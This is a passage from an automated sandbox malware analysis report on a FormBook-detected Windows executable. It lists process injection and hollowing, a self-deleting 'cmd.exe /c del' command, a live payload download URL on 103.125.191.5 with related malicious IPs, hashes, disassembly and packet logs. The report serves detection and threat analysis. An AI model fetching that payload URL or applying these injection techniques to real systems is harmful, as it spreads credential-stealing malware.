    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05157794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050E8794 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051137F5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0510A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050DC600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05108E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05191608 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0518FE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050DE620 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050E7E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0519AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050E766D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050FAE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0516FE87 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051546A7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051A0EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051A8ED6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05118EC7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0518FEC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051036CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050E76E2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051016E0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050D9100 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0510513A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050F4120 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050F4120 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050FB944 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050DC962 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050DB171 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05102990 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050FC182 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0510A185 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051551BE mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051061A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051569A6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051949A4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050DB1E1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051641E8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_05157016 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_051A4015 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_050EB02A mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0510002D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion:

    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Section loaded: unknown | target: C:\Windows\explorer.exe | protection: execute and read and write
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Section loaded: unknown | target: C:\Windows\SysWOW64\msiexec.exe | protection: execute and read and write
    Modifies the context of a thread in another process (thread injection)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Thread register set: target process: 3424
    Queues an APC in another process (thread injection)
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
    Sample uses process hollowing technique
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe | base address: 1240000
    Source: C:\Users\user\Desktop\2eD17GZuWs.exe | Process created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: explorer.exe, 0000000A.00000000.882628410.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp | Binary or memory string: Program Manager
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp | Binary or memory string: Progman
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

    Stealing of Sensitive Information:

    Yara detected FormBook
    Source: Yara match | File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Yara detected Generic Dropper
    Source: Yara match | File source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6680, type: MEMORY

    Remote Access Functionality:

    Yara detected FormBook
    Source: Yara match | File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 412 | Virtualization/Sandbox Evasion 21 | OS Credential Dumping | Security Software Discovery 621 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 412 | LSASS Memory | Virtualization/Sandbox Evasion 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | System Information Discovery 21 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

    Behavior Graph

    (Behavior graph image not reproduced in this text version. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet.)
    Screenshots

    (Screenshot thumbnails not reproduced in this text version.)

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    2eD17GZuWs.exe | 25% | Virustotal |
    2eD17GZuWs.exe | 2% | ReversingLabs |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
    http://www.tiro.com | 0% | URL Reputation | safe
    http://103.125.191.5/bin_xMjelaYnr43.binY | 0% | Avira URL Cloud | safe
    http://www.goodfont.co.kr | 0% | URL Reputation | safe
    http://www.carterandcone.coml | 0% | URL Reputation | safe
    http://www.sajatypeworks.com | 0% | URL Reputation | safe
    http://www.typography.netD | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
    http://fontfabrik.com | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
    http://103.125.191.5/ | 4% | Virustotal |
    http://103.125.191.5/ | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
    https://in_xMjelaYnr43.bin | 0% | Avira URL Cloud | safe
    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://www.sandoll.co.kr | 0% | URL Reputation | safe
    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
    http://www.sakkal.com | 0% | URL Reputation | safe
    http://103.125.191.5/bin_xMjelaYnr43.bin | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://103.125.191.5/bin_xMjelaYnr43.bin | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.fontbureau.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.fontbureau.com/designersG | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.fontbureau.com/designers/? | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.founder.com.cn/cn/bThe | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers? | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.tiro.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://103.125.191.5/bin_xMjelaYnr43.binY | 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.com/designers | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.goodfont.co.kr | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.carterandcone.coml | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.sajatypeworks.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.typography.netD | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.founder.com.cn/cn/cThe | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://fontfabrik.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.founder.com.cn/cn | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://103.125.191.5/ | 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmp | false | 4% Virustotal; Avira URL Cloud: safe | unknown
    http://www.jiyu-kobo.co.jp/ | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    https://in_xMjelaYnr43.bin | 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | low
    http://www.galapagosdesign.com/DPlease | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.fontbureau.com/designers8 | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.%s.comPA | explorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
    http://www.fonts.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | | high
    http://www.sandoll.co.kr | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.urwpp.deDPlease | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.zhongyicts.com.cn | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
    http://www.sakkal.com | explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

    Contacted IPs

    Public

    IP | Domain | Country | ASN | ASN Name | Malicious
    103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP VN | true

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:320425
                        Start date:19.11.2020
                        Start time:10:47:26
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:2eD17GZuWs.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 52% (good quality ratio 42.1%)
                        • Quality average: 65.4%
                        • Quality standard deviation: 37.1%
                        HCA Information:
                        • Successful, ratio: 69%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection | Context
103.125.191.5 | Unique food order.xlsx | malicious | 103.125.191.5/bin_xMjelaYnr43.bin

                        Domains

                        No context

                        ASN

Match | Associated Sample Name / URL | Detection | Context
VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP, VN | Unique food order.xlsx | malicious | 103.125.191.5
| tt payment proof.xlsx | malicious | 103.125.191.187
| TIE-3735-2020.xlsx | malicious | 103.125.191.229
| payslip.s.xlsx | malicious | 103.125.191.187
| Telex-relase.xlsx | malicious | 103.141.138.120
| Y0L60XAhvo.rtf | malicious | 103.141.138.122
| d6pj421rXA.exe | malicious | 103.139.45.59
| 8YPssSkVtu.rtf | malicious | 103.141.138.87
| PI098763556299.xlsx | malicious | 103.125.191.229
| PIT12425009.xlsx | malicious | 103.125.191.229
| wIeFid8p7Q.exe | malicious | 103.125.189.164
| Dell ordine-09362-9-11-2020.exe | malicious | 103.139.45.59
| shipping documents.xlsx | malicious | 103.133.108.6
| shipping documents.xlsx | malicious | 103.133.108.6
| EES RFQ 60-19__pdf.exe | malicious | 103.114.107.156
| Quotation_20CF18909.xlsx | malicious | 103.141.138.122
| Quotation_20CF18909.xlsx | malicious | 103.141.138.122
| Z08LsyTAN6.exe | malicious | 103.125.189.164
| QUO_M.VECOQUEEN.xlsx.docx | malicious | 103.125.191.123
| R56D5hnFR3.rtf | malicious | 103.125.191.123

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):4.914988096771549
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.15%
                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2eD17GZuWs.exe
                        File size:61440
                        MD5:c05eee88f0b57e853996957d6523397b
                        SHA1:fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
                        SHA256:7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
                        SHA512:9441441f5d6d84e4c674e77013ce1bf562173195de9ac1c05463bcf0bbda51345b6af219b279f93e7d2df84bbfb22d11906b8a145f1fe98efaf3a28786be220f
                        SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......P.....................0....................@........

                        File Icon

                        Icon Hash:20047c7c70f0e004

                        Static PE Info

                        General

                        Entrypoint:0x401218
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x50B8A68A [Fri Nov 30 12:28:58 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:823b3db4fa697cef327445c59300049d

                        Entrypoint Preview

                        Instruction
                        push 004019DCh
                        call 00007FA87CA2F933h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        or al, C7h
                        stosd
                        pushfd
                        add bl, ah
                        inc esi
                        xchg eax, edi
                        sbb eax, A17D13C7h
                        popad
                        in eax, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        popad
                        je 0000F9B5h
                        jns 00007FA87CA2F9ADh
                        imul esp, dword ptr [ebp+74h], 73h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        xor dword ptr [eax], eax
                        pop ds
                        mov ebp, AFADF0F4h
                        xchg eax, ebx
                        or byte ptr [ebp-54h], FFFFFFEDh
                        sub al, B9h
                        mov word ptr [edx+3BA912D4h], cs
                        cmc

                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc304 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x8f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x230 | 0x30 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xac | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb660 | 0xc000 | False | 0.449890136719 | data | 5.65312994467 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0xd000 | 0x13bc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x8f8 | 0x1000 | False | 0.16943359375 | data | 1.94217064888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xf7c8 | 0x130 | data | |
RT_ICON | 0xf4e0 | 0x2e8 | data | |
RT_ICON | 0xf3b8 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xf388 | 0x30 | data | |
RT_VERSION | 0xf150 | 0x238 | data | English | United States

                        Imports

DLL | Import
USER32.DLL | HideCaret
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                        Version Infos

Description | Data
Translation | 0x0409 0x04b0
InternalName | LUKENES
FileVersion | 1.00
CompanyName | Dynegy
Comments | Dynegy
ProductName | aftrykkets
ProductVersion | 1.00
OriginalFilename | LUKENES.exe

                        Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                        Network Behavior

                        Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/19/20-10:49:58.574580 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49756 | 80 | 192.168.2.4 | 103.125.191.5

                        Network Port Distribution

                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2020 10:49:58.257344961 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:58.573558092 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:58.573877096 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:58.574579954 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:58.891490936 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:58.891516924 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:58.891535044 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:58.891551971 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:58.891586065 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:58.891609907 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:59.207879066 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207909107 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207926035 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207943916 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207961082 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207978010 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.207998991 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.208019972 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:49:59.208074093 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:49:59.208142996 CET | 49756 | 80 | 192.168.2.4 | 103.125.191.5
Nov 19, 2020 10:50:01.525682926 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525711060 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525722980 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525733948 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525783062 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525830030 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
Nov 19, 2020 10:50:01.525904894 CET | 80 | 49756 | 103.125.191.5 | 192.168.2.4
